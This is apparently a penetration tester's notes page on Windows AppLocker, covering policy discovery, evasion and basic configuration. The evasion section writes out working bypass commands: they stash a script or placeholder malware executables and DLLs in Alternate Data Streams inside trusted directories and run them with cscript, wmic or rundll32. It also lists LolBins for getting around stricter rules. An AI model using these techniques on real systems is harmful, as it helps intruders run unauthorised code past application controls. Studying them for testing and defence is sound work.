AppLocker

30.04.2024 ยท dadevel

AppLocker is a feature on Windows, that controls which executables, DLLs and scripts an unprivileged user can execute. Local service accounts and admins are usually not affected.

Unlike WDAC, Microsoft does not consider AppLocker to be a security boundary. The default policies are insecure and can be easily bypassed.

Discovery

When you try to run an executable that is blocked by AppLocker you get the following error: This program is blocked by group policy. For more information, contact your system administrator.

Show AppLocker policies as unprivileged user.

Get-ApplockerPolicy -Effective -Xml
Get-ApplockerPolicy -Effective | Select -ExpandProperty RuleCollections
Get-ChildItem 'HKLM:Software\Policies\Microsoft\Windows\SrpV2'

Retrieve AppLocker policies from GPOs (source).

Get-DomainGPO -Domain corp.local | ?{ $_.DisplayName -ilike '*AppLocker*' } | Select DisplayName,GPCFileSyspath
cp \\dc01.corp.local\SysVol\corp.com\Policies\{7E1E1636-1A59-4C35-895B-3AEB1CA8CFC2}\Machine\Registry.pol .
Parse-PolFile .\Registry.pol

Evasion

The default AppLocker policies do not apply to DLLs. Therefore they can be easily bypassed, e.g. with rundll32.exe.

Furthermore executables under C:\Program Files, C:\Program Files (x86) and C:\Windows are allowed. C:\Windows has multiple globally writable subdirectories. AppLocker can be bypassed when you have write permissions in at least one excluded directory.

Check for each writable directory if you have execution rights (RX or F).

icacls.exe C:\Windows\Tasks

Bypass AppLocker trough writable file in a "trusted location" with an Alternate Data Stream (source).

echo new ActiveXObject('WScript.Shell').Run('powershell.exe') > "C:\Program Files (x86)\App\Logfile.log:test.js"
cscript.exe "C:\Program Files (x86)\App\Logfile.log:test.js"
type .\malware.exe > "C:\Program Files (x86)\Teamviewer\TeamViewer12_Logfile.log:malware.exe
wmic.exe process call create '"C:\Program Files (x86)\Teamviewer\TeamViewer12_Logfile.log:malware.exe"
type .\malware.dll > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll"
rundll32.exe "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

More restrictive AppLocker policies can often be bypassed trough LolBins like:

C:\Windows\Microsoft.NET\Framework64\*\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\*\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\*\Microsoft.Workflow.Compiler.exe
C:\Windows\Microsoft.NET\Framework64\*\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\*\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\*\addinprocess.exe
C:\Windows\Microsoft.NET\Framework64\*\addinprocess32.exe
C:\Windows\Microsoft.NET\Framework64\*\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\*\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\*\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\*\Microsoft.Workflow.Compiler.exe
C:\Windows\Microsoft.NET\Framework\*\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\*\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\*\addinprocess.exe
C:\Windows\Microsoft.NET\Framework\*\addinprocess32.exe
C:\Windows\Microsoft.NET\Framework\*\aspnet_compiler.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cscript.exe
C:\Windows\System32\mshta.exe
C:\Windows\System32\regsvr32.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\wscript.exe

If they are blocked search for abusable features in 3rd-party applications or installed scripting languages like Perl or Python.

References:

Configuration

Open secpol.msc as admin and select to Application Control Policies/AppLocker. Right-click and select Create default rules on Executable Rules, Windows Installer Rules, Script Rules and Packaged App Rules Then right-click on AppLocker, select Properties, enable all four rule collections and click Ok.

Enable autostart for the AppIDSvc service.

Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\AppIDSvc -Name Start -Type DWORD -Value 0x2  -Force
Start-Service AppIDSvc

Apply group policies.

gpupdate.exe /force